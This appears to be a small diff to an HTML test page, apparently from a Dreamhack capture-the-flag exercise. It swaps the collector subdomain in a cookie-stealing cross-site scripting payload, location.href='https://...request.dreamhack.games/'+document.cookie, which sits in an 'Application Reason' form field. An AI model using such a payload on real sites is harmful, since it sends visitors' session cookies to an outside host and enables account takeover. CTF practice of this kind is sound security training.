--- a/test.html
+++ b/test.html
@@ -49,7 +49,7 @@
         </div>
         <div>
           <h2>Application Reason</h2>
-          location.href="https://golliza.request.dreamhack.games/"+document.cookie
+          location.href="https://bpopzse.request.dreamhack.games/"+document.cookie
         </div>
       </form>
     </div>
